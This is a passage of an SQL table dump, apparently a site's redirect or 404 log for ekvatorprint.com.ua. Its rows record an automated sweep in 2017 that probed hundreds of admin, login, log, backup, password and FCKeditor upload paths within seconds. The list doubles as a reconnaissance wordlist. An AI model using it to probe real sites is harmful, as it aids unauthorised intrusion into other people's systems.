00:00:00',301),(4802,'http://ekvatorprint.com.ua/ab/docs/',NULL,'','',1,0,'2017-01-20 13:27:09','0000-00-00 00:00:00',301),(4803,'http://ekvatorprint.com.ua/about.',NULL,'','',1,0,'2017-01-20 13:27:09','0000-00-00 00:00:00',301),(4804,'http://ekvatorprint.com.ua/about.php',NULL,'','',1,0,'2017-01-20 13:27:09','0000-00-00 00:00:00',301),(4805,'http://ekvatorprint.com.ua/aboutus',NULL,'','',1,0,'2017-01-20 13:27:09','0000-00-00 00:00:00',301),(4806,'http://ekvatorprint.com.ua/aboutus.php',NULL,'','',1,0,'2017-01-20 13:27:09','0000-00-00 00:00:00',301),(4807,'http://ekvatorprint.com.ua/abstractsadmin',NULL,'','',1,0,'2017-01-20 13:27:09','0000-00-00 00:00:00',301),(4808,'http://ekvatorprint.com.ua/aboutus.',NULL,'','',1,0,'2017-01-20 13:27:09','0000-00-00 00:00:00',301),(4809,'http://ekvatorprint.com.ua/access-log',NULL,'','',1,0,'2017-01-20 13:27:09','0000-00-00 00:00:00',301),(4810,'http://ekvatorprint.com.ua/access_admin.php',NULL,'','',1,0,'2017-01-20 13:27:10','0000-00-00 00:00:00',301),(4811,'http://ekvatorprint.com.ua/access-log/',NULL,'','',1,0,'2017-01-20 13:27:10','0000-00-00 00:00:00',301),(4812,'http://ekvatorprint.com.ua/acceptance_config.yml',NULL,'','',1,0,'2017-01-20 13:27:10','0000-00-00 00:00:00',301),(4813,'http://ekvatorprint.com.ua/access/',NULL,'','',1,0,'2017-01-20 13:27:09','0000-00-00 00:00:00',301),(4814,'http://ekvatorprint.com.ua/access',NULL,'','',1,0,'2017-01-20 13:27:10','0000-00-00 00:00:00',301),(4815,'http://ekvatorprint.com.ua/access.log',NULL,'','',1,0,'2017-01-20 13:27:10','0000-00-00 00:00:00',301),(4816,'http://ekvatorprint.com.ua/access_admin.',NULL,'','',1,0,'2017-01-20 13:27:10','0000-00-00 00:00:00',301),(4817,'http://ekvatorprint.com.ua/access_logs/',NULL,'','',1,0,'2017-01-20 13:27:10','0000-00-00 00:00:00',301),(4818,'http://ekvatorprint.com.ua/account',NULL,'','',1,0,'2017-01-20 13:27:10','0000-00-00 00:00:00',301),(4819,'http://ekvatorprint.com.ua/accesslog',NULL,'','',1,0,'2017-01-20 13:27:10','0000-00-00 00:00:00',301),(4820,'http://ekvatorprint.com.ua/account.',NULL,'','',1,0,'2017-01-20 13:27:10','0000-00-00 00:00:00',301),(4821,'http://ekvatorprint.com.ua/access_log',NULL,'','',1,0,'2017-01-20 13:27:10','0000-00-00 00:00:00',301),(4822,'http://ekvatorprint.com.ua/accesslog/',NULL,'','',1,0,'2017-01-20 13:27:10','0000-00-00 00:00:00',301),(4823,'http://ekvatorprint.com.ua/account.html',NULL,'','',1,0,'2017-01-20 13:27:10','0000-00-00 00:00:00',301),(4824,'http://ekvatorprint.com.ua/account.php',NULL,'','',2,0,'2017-01-20 13:27:10','0000-00-00 00:00:00',301),(4825,'http://ekvatorprint.com.ua/account/',NULL,'','',1,0,'2017-01-20 13:27:10','0000-00-00 00:00:00',301),(4826,'http://ekvatorprint.com.ua/account/login',NULL,'','',1,0,'2017-01-20 13:27:10','0000-00-00 00:00:00',301),(4827,'http://ekvatorprint.com.ua/account/login.htm',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4828,'http://ekvatorprint.com.ua/account/login.html',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4829,'http://ekvatorprint.com.ua/account/login.php',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4830,'http://ekvatorprint.com.ua/account/login.',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4831,'http://ekvatorprint.com.ua/account/login.jsp',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4832,'http://ekvatorprint.com.ua/account/login.rb',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4833,'http://ekvatorprint.com.ua/account/login.py',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4834,'http://ekvatorprint.com.ua/account/login.shtml',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4835,'http://ekvatorprint.com.ua/account/logon',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4836,'http://ekvatorprint.com.ua/accounts',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4837,'http://ekvatorprint.com.ua/account/signin',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4838,'http://ekvatorprint.com.ua/accounts.php',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4839,'http://ekvatorprint.com.ua/accounts.',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4840,'http://ekvatorprint.com.ua/accounts.cgi',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4841,'http://ekvatorprint.com.ua/accounts.htm',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4842,'http://ekvatorprint.com.ua/accounts.html',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4843,'http://ekvatorprint.com.ua/accounts.jsp',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4844,'http://ekvatorprint.com.ua/accounts.pl',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4845,'http://ekvatorprint.com.ua/accounts.py',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4846,'http://ekvatorprint.com.ua/accounts/login.',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4847,'http://ekvatorprint.com.ua/accounts.rb',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4848,'http://ekvatorprint.com.ua/accounts/',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4849,'http://ekvatorprint.com.ua/accounts/login.php',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4850,'http://ekvatorprint.com.ua/accounts/login',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4851,'http://ekvatorprint.com.ua/accounts.txt',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4852,'http://ekvatorprint.com.ua/accounts/login.htm',NULL,'','',1,0,'2017-01-20 13:27:11','0000-00-00 00:00:00',301),(4853,'http://ekvatorprint.com.ua/accounts/login.jsp',NULL,'','',1,0,'2017-01-20 13:27:12','0000-00-00 00:00:00',301),(4854,'http://ekvatorprint.com.ua/accounts/login.shtml',NULL,'','',1,0,'2017-01-20 13:27:12','0000-00-00 00:00:00',301),(4855,'http://ekvatorprint.com.ua/accounts/login.html',NULL,'','',1,0,'2017-01-20 13:27:12','0000-00-00 00:00:00',301),(4856,'http://ekvatorprint.com.ua/accounts/login.py',NULL,'','',1,0,'2017-01-20 13:27:12','0000-00-00 00:00:00',301),(4857,'http://ekvatorprint.com.ua/accounts/logon',NULL,'','',1,0,'2017-01-20 13:27:12','0000-00-00 00:00:00',301),(4858,'http://ekvatorprint.com.ua/accounts/signin',NULL,'','',1,0,'2017-01-20 13:27:12','0000-00-00 00:00:00',301),(4859,'http://ekvatorprint.com.ua/accounts/login.rb',NULL,'','',1,0,'2017-01-20 13:27:12','0000-00-00 00:00:00',301),(4860,'http://ekvatorprint.com.ua/acs-admin',NULL,'','',1,0,'2017-01-20 13:27:12','0000-00-00 00:00:00',301),(4861,'http://ekvatorprint.com.ua/actions',NULL,'','',1,0,'2017-01-20 13:27:12','0000-00-00 00:00:00',301),(4862,'http://ekvatorprint.com.ua/actions_admin.php',NULL,'','',1,0,'2017-01-20 13:27:12','0000-00-00 00:00:00',301),(4863,'http://ekvatorprint.com.ua/activitysessions/docs/',NULL,'','',1,0,'2017-01-20 13:27:12','0000-00-00 00:00:00',301),(4864,'http://ekvatorprint.com.ua/activation.php',NULL,'','',1,0,'2017-01-20 13:27:12','0000-00-00 00:00:00',301),(4865,'http://ekvatorprint.com.ua/actions_admin.',NULL,'','',1,0,'2017-01-20 13:27:12','0000-00-00 00:00:00',301),(4866,'http://ekvatorprint.com.ua/activation.',NULL,'','',1,0,'2017-01-20 13:27:12','0000-00-00 00:00:00',301),(4867,'http://ekvatorprint.com.ua/ad_admin.php',NULL,'','',1,0,'2017-01-20 13:27:12','0000-00-00 00:00:00',301),(4868,'http://ekvatorprint.com.ua/ad_admin.',NULL,'','',1,0,'2017-01-20 13:27:12','0000-00-00 00:00:00',301),(4869,'http://ekvatorprint.com.ua/adadmin',NULL,'','',1,0,'2017-01-20 13:27:12','0000-00-00 00:00:00',301),(4870,'http://ekvatorprint.com.ua/adcadmin',NULL,'','',1,0,'2017-01-20 13:27:12','0000-00-00 00:00:00',301),(4871,'http://ekvatorprint.com.ua/adclick',NULL,'','',1,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4872,'http://ekvatorprint.com.ua/add',NULL,'','',1,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4873,'http://ekvatorprint.com.ua/add_link.php',NULL,'','',1,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4874,'http://ekvatorprint.com.ua/addNodeListener',NULL,'','',1,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4875,'http://ekvatorprint.com.ua/addadmin.php',NULL,'','',1,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4876,'http://ekvatorprint.com.ua/addadmin.',NULL,'','',1,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4877,'http://ekvatorprint.com.ua/add_link.',NULL,'','',1,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4878,'http://ekvatorprint.com.ua/actions_admin',NULL,'','',1,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4879,'http://ekvatorprint.com.ua/addons',NULL,'','',1,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4880,'http://ekvatorprint.com.ua/adm-bin/',NULL,'','',1,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4881,'http://ekvatorprint.com.ua/adm.php',NULL,'','',2,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4882,'http://ekvatorprint.com.ua/adm.',NULL,'','',1,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4883,'http://ekvatorprint.com.ua/adm.htm',NULL,'','',1,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4884,'http://ekvatorprint.com.ua/adm.cgi',NULL,'','',1,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4885,'http://ekvatorprint.com.ua/adm.html',NULL,'','',1,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4886,'http://ekvatorprint.com.ua/adm.rb',NULL,'','',1,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4887,'http://ekvatorprint.com.ua/adm.pl',NULL,'','',1,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4888,'http://ekvatorprint.com.ua/adm.shtml',NULL,'','',1,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4889,'http://ekvatorprint.com.ua/adm.jsp',NULL,'','',1,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4890,'http://ekvatorprint.com.ua/adm.py',NULL,'','',1,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4891,'http://ekvatorprint.com.ua/adm/admloginuser.php',NULL,'','',1,0,'2017-01-20 13:27:13','0000-00-00 00:00:00',301),(4892,'http://ekvatorprint.com.ua/adm/',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4893,'http://ekvatorprint.com.ua/adm/fckeditor',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4894,'http://ekvatorprint.com.ua/adm/admloginuser.',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4895,'http://ekvatorprint.com.ua/adm/style/admin.css',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4896,'http://ekvatorprint.com.ua/admin /',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4897,'http://ekvatorprint.com.ua/adm/index.php',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4898,'http://ekvatorprint.com.ua/adm/index.',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4899,'http://ekvatorprint.com.ua/adminphp',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4900,'http://ekvatorprint.com.ua/adm/index.html',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4901,'http://ekvatorprint.com.ua/admin-ANTIGO',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4902,'http://ekvatorprint.com.ua/admin-area',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4903,'http://ekvatorprint.com.ua/admin-ajax.php',NULL,'','',2,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4904,'http://ekvatorprint.com.ua/admin-authz.xml',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4905,'http://ekvatorprint.com.ua/admin-ajax.',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4906,'http://ekvatorprint.com.ua/admin-cgi',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4907,'http://ekvatorprint.com.ua/admin-admin',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4908,'http://ekvatorprint.com.ua/admin-console',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4909,'http://ekvatorprint.com.ua/admin-bin',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4910,'http://ekvatorprint.com.ua/admin-console/',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4911,'http://ekvatorprint.com.ua/admin-custom',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4912,'http://ekvatorprint.com.ua/admin-control',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4913,'http://ekvatorprint.com.ua/admin-footer.php',NULL,'','',1,0,'2017-01-20 13:27:14','0000-00-00 00:00:00',301),(4914,'http://ekvatorprint.com.ua/admin-functions.php',NULL,'','',1,0,'2017-01-20 13:27:15','0000-00-00 00:00:00',301),(4915,'http://ekvatorprint.com.ua/admin-header.php',NULL,'','',1,0,'2017-01-20 13:27:15','0000-00-00 00:00:00',301),(4916,'http://ekvatorprint.com.ua/admin-footer.',NULL,'','',1,0,'2017-01-20 13:27:15','0000-00-00 00:00:00',301),(4917,'http://ekvatorprint.com.ua/admin-functions.',NULL,'','',1,0,'2017-01-20 13:27:15','0000-00-00 00:00:00',301),(4918,'http://ekvatorprint.com.ua/admin-header.',NULL,'','',1,0,'2017-01-20 13:27:15','0000-00-00 00:00:00',301),(4919,'http://ekvatorprint.com.ua/readme.txt',NULL,'','',2,0,'2017-01-20 13:27:15','0000-00-00 00:00:00',301),(4920,'http://ekvatorprint.com.ua/admin-login',NULL,'','',1,0,'2017-01-20 13:27:15','0000-00-00 00:00:00',301),(4921,'http://ekvatorprint.com.ua/admin-login.php',NULL,'','',1,0,'2017-01-20 13:27:15','0000-00-00 00:00:00',301),(4922,'http://ekvatorprint.com.ua/admin-login.',NULL,'','',1,0,'2017-01-20 13:27:15','0000-00-00 00:00:00',301),(4923,'http://ekvatorprint.com.ua/admin-login.html',NULL,'','',1,0,'2017-01-20 13:27:15','0000-00-00 00:00:00',301),(4924,'http://ekvatorprint.com.ua/admin-odkazy.',NULL,'','',1,0,'2017-01-20 13:27:15','0000-00-00 00:00:00',301),(4925,'http://ekvatorprint.com.ua/admin-logout.',NULL,'','',1,0,'2017-01-20 13:27:15','0000-00-00 00:00:00',301),(4926,'http://ekvatorprint.com.ua/admin-logout.php',NULL,'','',1,0,'2017-01-20 13:27:15','0000-00-00 00:00:00',301),(4927,'http://ekvatorprint.com.ua/admin-new',NULL,'','',1,0,'2017-01-20 13:27:15','0000-00-00 00:00:00',301),(4928,'http://ekvatorprint.com.ua/admin-newcms',NULL,'','',1,0,'2017-01-20 13:27:15','0000-00-00 00:00:00',301),(4929,'http://ekvatorprint.com.ua/admin-odkazy.php',NULL,'','',1,0,'2017-01-20 13:27:15','0000-00-00 00:00:00',301),(4930,'http://ekvatorprint.com.ua/admin-op',NULL,'','',1,0,'2017-01-20 13:27:15','0000-00-00 00:00:00',301),(4931,'http://ekvatorprint.com.ua/admin-old',NULL,'','',1,0,'2017-01-20 13:27:16','0000-00-00 00:00:00',301),(4932,'http://ekvatorprint.com.ua/admin-post.',NULL,'','',1,0,'2017-01-20 13:27:16','0000-00-00 00:00:00',301),(4933,'http://ekvatorprint.com.ua/admin-post.php',NULL,'','',1,0,'2017-01-20 13:27:16','0000-00-00 00:00:00',301),(4934,'http://ekvatorprint.com.ua/admin-panel',NULL,'','',1,0,'2017-01-20 13:27:16','0000-00-00 00:00:00',301),(4935,'http://ekvatorprint.com.ua/admin-pictures',NULL,'','',1,0,'2017-01-20 13:27:16','0000-00-00 00:00:00',301),(4936,'http://ekvatorprint.com.ua/admin-serv/config/admpw',NULL,'','',1,0,'2017-01-20 13:27:16','0000-00-00 00:00:00',301),(4937,'http://ekvatorprint.com.ua/admin-serv',NULL,'','',1,0,'2017-01-20 13:27:16','0000-00-00 00:00:00',301),(4938,'http://ekvatorprint.com.ua/admin-wjg',NULL,'','',1,0,'2017-01-20 13:27:16','0000-00-00 00:00:00',301),(4939,'http://ekvatorprint.com.ua/admin-serv/',NULL,'','',1,0,'2017-01-20 13:27:16','0000-00-00 00:00:00',301),(4940,'http://ekvatorprint.com.ua/admin-web',NULL,'','',1,0,'2017-01-20 13:27:16','0000-00-00 00:00:00',301),(4941,'http://ekvatorprint.com.ua/admin.',NULL,'','',2,0,'2017-01-20 13:27:16','0000-00-00 00:00:00',301),(4942,'http://ekvatorprint.com.ua/admin.cgi',NULL,'','',1,0,'2017-01-20 13:27:16','0000-00-00 00:00:00',301),(4943,'http://ekvatorprint.com.ua/admin.dat',NULL,'','',1,0,'2017-01-20 13:27:16','0000-00-00 00:00:00',301),(4944,'http://ekvatorprint.com.ua/admin.cfm',NULL,'','',1,0,'2017-01-20 13:27:16','0000-00-00 00:00:00',301),(4945,'http://ekvatorprint.com.ua/admin.epc',NULL,'','',1,0,'2017-01-20 13:27:17','0000-00-00 00:00:00',301),(4946,'http://ekvatorprint.com.ua/admin.ex',NULL,'','',1,0,'2017-01-20 13:27:17','0000-00-00 00:00:00',301),(4947,'http://ekvatorprint.com.ua/admin.conf',NULL,'','',1,0,'2017-01-20 13:27:17','0000-00-00 00:00:00',301),(4948,'http://ekvatorprint.com.ua/admin.exe',NULL,'','',1,0,'2017-01-20 13:27:17','0000-00-00 00:00:00',301),(4949,'http://ekvatorprint.com.ua/admin.html',NULL,'','',1,0,'2017-01-20 13:27:17','0000-00-00 00:00:00',301),(4950,'http://ekvatorprint.com.ua/admin.htm',NULL,'','',1,0,'2017-01-20 13:27:17','0000-00-00 00:00:00',301),(4951,'http://ekvatorprint.com.ua/admin.inc.php',NULL,'','',1,0,'2017-01-20 13:27:17','0000-00-00 00:00:00',301),(4952,'http://ekvatorprint.com.ua/admin.js',NULL,'','',1,0,'2017-01-20 13:27:17','0000-00-00 00:00:00',301),(4953,'http://ekvatorprint.com.ua/admin.inc.',NULL,'','',1,0,'2017-01-20 13:27:17','0000-00-00 00:00:00',301),(4954,'http://ekvatorprint.com.ua/admin.jsp',NULL,'','',1,0,'2017-01-20 13:27:17','0000-00-00 00:00:00',301),(4955,'http://ekvatorprint.com.ua/admin.mdb',NULL,'','',1,0,'2017-01-20 13:27:17','0000-00-00 00:00:00',301),(4956,'http://ekvatorprint.com.ua/admin.mvc',NULL,'','',1,0,'2017-01-20 13:27:17','0000-00-00 00:00:00',301),(4957,'http://ekvatorprint.com.ua/admin.old',NULL,'','',1,0,'2017-01-20 13:27:17','0000-00-00 00:00:00',301),(4958,'http://ekvatorprint.com.ua/admin.pl',NULL,'','',1,0,'2017-01-20 13:27:17','0000-00-00 00:00:00',301),(4959,'http://ekvatorprint.com.ua/admin.passwd',NULL,'','',1,0,'2017-01-20 13:27:17','0000-00-00 00:00:00',301),(4960,'http://ekvatorprint.com.ua/admin.py',NULL,'','',1,0,'2017-01-20 13:27:17','0000-00-00 00:00:00',301),(4961,'http://ekvatorprint.com.ua/admin.srf',NULL,'','',1,0,'2017-01-20 13:27:17','0000-00-00 00:00:00',301),(4962,'http://ekvatorprint.com.ua/admin.shtml',NULL,'','',1,0,'2017-01-20 13:27:17','0000-00-00 00:00:00',301),(4963,'http://ekvatorprint.com.ua/admin.woa',NULL,'','',1,0,'2017-01-20 13:27:17','0000-00-00 00:00:00',301),(4964,'http://ekvatorprint.com.ua/admin.rb',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4965,'http://ekvatorprint.com.ua/admin/access.log',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4966,'http://ekvatorprint.com.ua/admin/.config',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4967,'http://ekvatorprint.com.ua/admin/account.',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4968,'http://ekvatorprint.com.ua/admin/account.php',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4969,'http://ekvatorprint.com.ua/admin/FCKeditor',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4970,'http://ekvatorprint.com.ua/admin/account.html',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4971,'http://ekvatorprint.com.ua/admin/access.txt',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4972,'http://ekvatorprint.com.ua/admin/access_log',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4973,'http://ekvatorprint.com.ua/admin/admin',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4974,'http://ekvatorprint.com.ua/admin/admin-login.php',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4975,'http://ekvatorprint.com.ua/admin/admin-login.',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4976,'http://ekvatorprint.com.ua/admin/admin-login.html',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4977,'http://ekvatorprint.com.ua/admin/admin.php',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4978,'http://ekvatorprint.com.ua/admin/admin.',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4979,'http://ekvatorprint.com.ua/admin/admin.shtml',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4980,'http://ekvatorprint.com.ua/admin/admin.html',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4981,'http://ekvatorprint.com.ua/admin/admin/login',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4982,'http://ekvatorprint.com.ua/admin/adminLogin.php',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4983,'http://ekvatorprint.com.ua/admin/adminLogin.',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4984,'http://ekvatorprint.com.ua/admin/adminLogin.html',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4985,'http://ekvatorprint.com.ua/admin/admin_login.php',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4986,'http://ekvatorprint.com.ua/admin/admin_login.',NULL,'','',1,0,'2017-01-20 13:27:18','0000-00-00 00:00:00',301),(4987,'http://ekvatorprint.com.ua/admin/admin_login.html',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(4988,'http://ekvatorprint.com.ua/admin/backups/',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(4989,'http://ekvatorprint.com.ua/admin/controlpanel.php',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(4990,'http://ekvatorprint.com.ua/admin/backup/',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(4991,'http://ekvatorprint.com.ua/admin/controlpanel.',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(4992,'http://ekvatorprint.com.ua/admin/cp.php',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(4993,'http://ekvatorprint.com.ua/admin/controlpanel.html',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(4994,'http://ekvatorprint.com.ua/admin/download.php',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(4995,'http://ekvatorprint.com.ua/admin/cp.',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(4996,'http://ekvatorprint.com.ua/admin/dumper/',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(4997,'http://ekvatorprint.com.ua/admin/error.log',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(4998,'http://ekvatorprint.com.ua/admin/error.txt',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(4999,'http://ekvatorprint.com.ua/admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5000,'http://ekvatorprint.com.ua/admin/export.php',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5001,'http://ekvatorprint.com.ua/admin/error_log',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5002,'http://ekvatorprint.com.ua/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5003,'http://ekvatorprint.com.ua/admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5004,'http://ekvatorprint.com.ua/admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5005,'http://ekvatorprint.com.ua/admin/fckeditor/editor/filemanager/connectors/asp/upload.asp',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5006,'http://ekvatorprint.com.ua/admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5007,'http://ekvatorprint.com.ua/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5008,'http://ekvatorprint.com.ua/admin/fckeditor/editor/filemanager/connectors/php/connector.php',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5009,'http://ekvatorprint.com.ua/admin/fckeditor/editor/filemanager/connectors/php/upload.php',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5010,'http://ekvatorprint.com.ua/admin/fckeditor/editor/filemanager/upload/asp/upload.asp',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5011,'http://ekvatorprint.com.ua/admin/file.php',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5012,'http://ekvatorprint.com.ua/admin/home.',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5013,'http://ekvatorprint.com.ua/admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5014,'http://ekvatorprint.com.ua/admin/files.php',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5015,'http://ekvatorprint.com.ua/admin/fckeditor/editor/filemanager/upload/php/upload.php',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5016,'http://ekvatorprint.com.ua/admin/home.php',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5017,'http://ekvatorprint.com.ua/admin/home.html',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5018,'http://ekvatorprint.com.ua/admin/index.php',NULL,'','',10,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5019,'http://ekvatorprint.com.ua/admin/includes/configure.php~',NULL,'','',1,0,'2017-01-20 13:27:19','0000-00-00 00:00:00',301),(5020,'http://ekvatorprint.com.ua/admin/index.',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 00:00:00',301),(5021,'http://ekvatorprint.com.ua/admin/index.html',NULL,'','',1,0,'2017-01-20 13:27:20','0000-00-00 